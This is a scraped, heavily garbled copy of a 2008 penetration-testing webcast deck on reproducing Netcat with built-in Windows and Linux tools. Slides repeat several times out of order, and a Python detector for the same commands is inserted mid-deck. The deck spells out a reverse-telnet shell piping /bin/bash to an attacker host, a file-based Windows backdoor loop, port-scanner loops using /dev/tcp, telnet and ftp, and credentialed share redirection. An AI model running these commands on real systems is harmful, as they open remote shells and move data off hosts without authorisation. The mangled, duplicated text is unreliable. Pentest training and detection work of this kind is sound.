  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or, rely on nslookup to pull domain names that include commands
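As an added defender-side example (not code from the original slides), the following Python flags the command-line shapes this deck demonstrates when they show up in process-creation telemetry: the scripted ftp -s: scanner, the wmic telnet-killer loop, Standard Out redirected into a share, net use with credentials, the file shell, and the Linux /dev/tcp and reverse-telnet commands from slides 19-22. It assumes command lines are already being collected (Sysmon Event ID 1 or Security event 4688 with command-line auditing on Windows, auditd on Linux); the hostnames, users, timestamps and log records are constructed.

```python
"""Added defender-side example (not from the original slides): flag the
"Netcat without Netcat" command-line shapes from this deck in process-creation
telemetry. Every log record below is constructed for the example."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# (technique tag, regex). Each regex follows the exact shape used on the slides;
# treat them as hunt starting points, not a complete signature set.
PATTERNS = [
    # slides 28-30: ftp client driven by a command file (-s:) instead of a human
    ("ftp-scripted", re.compile(r"\bftp(?:\.exe)?\s+(?:.*\s)?-s:", re.I)),
    # slide 26: telnet client pointed at something other than TCP/23
    ("telnet-nonstandard", re.compile(r"\btelnet(?:\.exe)?\s+\S+\s+(?!23\b)\d+\b", re.I)),
    # slide 26: the every-5-seconds telnet killer
    ("wmic-kill-telnet", re.compile(r"\bwmic\s+process\s+where\s+name=.?telnet\.exe.?\s+delete", re.I)),
    # slide 31: Standard Out redirected straight into a UNC path
    ("share-redirect", re.compile(r">\s*\\\\[^\\\s]+\\[^\\\s]+\\")),
    # slide 31: net use with a password and /u: on the command line
    ("net-use-creds", re.compile(r"\bnet\s+use\s+\\\\\S+\s+\S+\s+/u(?:ser)?:", re.I)),
    # slide 33: FOR /F feeding file lines to cmd.exe /c with output appended
    ("file-shell", re.compile(r"for\s+/f\s+.*\bcmd(?:\.exe)?\s+/c\s+%+\w+.*>>", re.I)),
    # slides 19-20: bash /dev/tcp pseudo-device
    ("devtcp", re.compile(r"/dev/tcp/")),
    # slide 22: telnet | /bin/bash | telnet
    ("reverse-telnet", re.compile(r"\btelnet\s+\S+\s+\d+\s*\|\s*/bin/(?:ba)?sh\s*\|\s*telnet\b")),
]


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    cmdline: str


def classify(cmdline):
    """Return the technique tags whose regex matches this command line."""
    return [tag for tag, rx in PATTERNS if rx.search(cmdline)]


def flag_events(events):
    """Keep only events matching at least one pattern, paired with their tags."""
    return [(ev, tags) for ev in events if (tags := classify(ev.cmdline))]


def find_scan_bursts(events, min_events=10, window=timedelta(seconds=60)):
    """Many ftp -s: or telnet launches from one host+user inside `window` is
    what the FOR /L scanner loops of slides 26 and 29 look like in a log."""
    starts = defaultdict(list)
    for ev in events:
        tags = classify(ev.cmdline)
        if "ftp-scripted" in tags or "telnet-nonstandard" in tags:
            starts[(ev.host, ev.user)].append(ev.ts)
    bursts = []
    for key, times in starts.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):  # sliding window over sorted timestamps
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= min_events:
                bursts.append(key)
                break
    return bursts


def sample_events():
    """Constructed process-creation records; hosts, users and times are made up."""
    t0 = datetime(2008, 8, 14, 10, 0, 0)
    evs = [Event(t0 + timedelta(seconds=i), "WS01", r"lab\tester", "ftp -s:ftp.txt")
           for i in range(12)]  # the slide-29 loop: one ftp launch per port
    evs += [
        Event(t0 + timedelta(minutes=5), "WS01", r"lab\tester",
              'wmic process where name="telnet.exe" delete'),
        Event(t0 + timedelta(minutes=6), "WS01", r"lab\tester",
              r"net use \\FS01 P@ssw0rd /u:lab\tester"),
        Event(t0 + timedelta(minutes=7), "WS01", r"lab\tester",
              r"cmd.exe /c type report.txt > \\FS01\dropbox\report.txt"),
        Event(t0 + timedelta(minutes=8), "WS02", r"lab\svc",
              r'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) '
              r"do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1"),
        Event(t0 + timedelta(minutes=9), "lnx01", "www-data",
              "bash -c 'echo > /dev/tcp/10.0.0.5/80'"),
        Event(t0 + timedelta(minutes=10), "lnx01", "www-data",
              "telnet 10.0.0.9 4444 | /bin/bash | telnet 10.0.0.9 4445"),
        # benign look-alikes: interactive ftp, and telnet to the real telnet port
        Event(t0 + timedelta(minutes=11), "WS03", r"lab\admin", "ftp ftp.example.test"),
        Event(t0 + timedelta(minutes=12), "WS03", r"lab\admin", "telnet switch01 23"),
    ]
    return evs


if __name__ == "__main__":
    for ev, tags in flag_events(sample_events()):
        print(f"{ev.ts:%H:%M:%S} {ev.host} {ev.user}: {', '.join(tags)}  <-  {ev.cmdline}")
    print("scan bursts:", find_scan_bursts(sample_events()))
```

The per-event tags catch single commands; the burst check is what turns a dozen innocuous-looking ftp launches into the slide-29 scanner.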
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection Refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file
Port 80 is listening
Storing Results and Iterating
• But, it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
Command-Line Port Scanner In Action
5 Not Closed
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker's machine via port1
• Receive output on attacker's machine on port2
Reverse Telnet Shell in Action
Windows
• Built-in command-line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But, sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 20
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 21
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
Slide 23: Reverse Telnet Shell in Action
[screenshot; no text is recoverable]
Slide 24: Windows
• Built-in command line has very clunky syntax
• Also, the telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Slide 25: Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here
Slide 26: Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-[ and then type quit to resume
  – Or, kill the telnet client every 5 seconds (the 6-count ping is the sleep):
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
Slide 27: More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!
Slide 28: Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
Slide 29: The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Slide 30: Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
